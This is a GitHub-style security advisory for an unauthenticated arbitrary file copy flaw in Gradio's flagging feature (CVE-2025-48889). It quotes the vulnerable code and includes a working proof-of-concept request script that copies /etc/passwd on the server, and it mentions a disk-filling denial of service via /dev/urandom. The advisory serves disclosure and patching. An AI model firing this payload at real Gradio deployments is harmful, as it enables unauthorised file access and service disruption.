Skip to content
GradioGHSA-8jw3-6x8j-v96g

Gradio Allows Unauthorized File Copy via Path Manipulation

Medium5.3CVE-2025-48889 · Published May 29, 2025 · updated Jun 5, 2026

GitHub advisory

Affected versions

PackageAffectedFixed in
gradio
PyPI
< 5.31.05.31.0
Details and references

An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. ### Description The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the `/gradio_api/run/predict` endpoint to trigger these file copies. **Source**: User-controlled `path` parameter in the flagging functionality JSON payload **Sink**: `shutil.copy` operation in `FileData._copy_to_dir()` method The vulnerable code flow: 1. A JSON payload is sent to the `/gradio_api/run/predict` endpoint 2. The `path` field within `FileData` object can reference any file on the system 3. When processing this request, the `Component.flag()` method creates a `GradioDataModel` object 4. The `FileData._copy_to_dir()` method uses this path without proper validation: ```python def _copy_to_dir(self, dir: str) -> FileData: pathlib.Path(dir).mkdir(exist_ok=True) new_obj = dict(self) if not self.path: raise ValueError("Source file path is not set") new_name = shutil.copy(self.path, dir) # vulnerable sink new_obj["path"] = new_name return self.__class__(**new_obj) ``` 5. The lack of validation allows copying any file the Gradio process can read ### PoC The following script demonstrates the vulnerability by copying `/etc/passwd` from the server to Gradio's flagged directory: Setup a Gradio app: ```python import gradio as gr def image_classifier(inp): return {'cat': 0.2, 'dog': 0.8} test = gr.Interface(fn=image_classifier, inputs="image", outputs="label") test.launch(share=True) ``` Run the PoC: ```python import requests url = "https://[your-gradio-app-url]/gradio_api/run/predict" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" } payload = { "data": [ { "path": "/etc/passwd", "url": "[your-gradio-app-url]", "orig_name": "network_config", "size": 5000, "mime_type": "text/plain", "meta": { "_type": "gradio.FileData" } }, {} ], "event_data": None, "fn_index": 4, "trigger_id": 11, "session_hash": "test123" } response = requests.post(url, headers=headers, json=payload) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") ```

CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Severity from
GitHub (reviewed advisory)
Weakness
CWE-434
Also known as
CVE-2025-48889, PYSEC-2025-119

More Gradio advisories

All Gradio
DateAdvisory
May 292025Gradio CORS Origin Validation Bypass Vulnerability
CVE-2025-5320Low3.7no fix yet
Mar 202025Gradio DOS in multipart boundry while uploading the file
CVE-2024-8966High7.5no fix yet
Mar 202025Gradio Vulnerable to Open Redirect
CVE-2024-8021Medium5.4no fix yet
Mar 202025Gradio Path Traversal vulnerability
CVE-2024-12217Medium5.3no fix yet
Mar 202025Gradio Vulnerable to Denial of Service (DoS) via Crafted Zip Bomb
CVE-2024-10569High7.5no fix yet
Mar 202025Gradio Vulnerable to Arbitrary File Deletion
CVE-2024-10648High8.2no fix yet

Critical advisories by email

Wednesdays: the week’s critical and high advisories in the AI and data stack, with the fixed versions. Only in weeks that have some.

Double opt-in. Unsubscribe any time.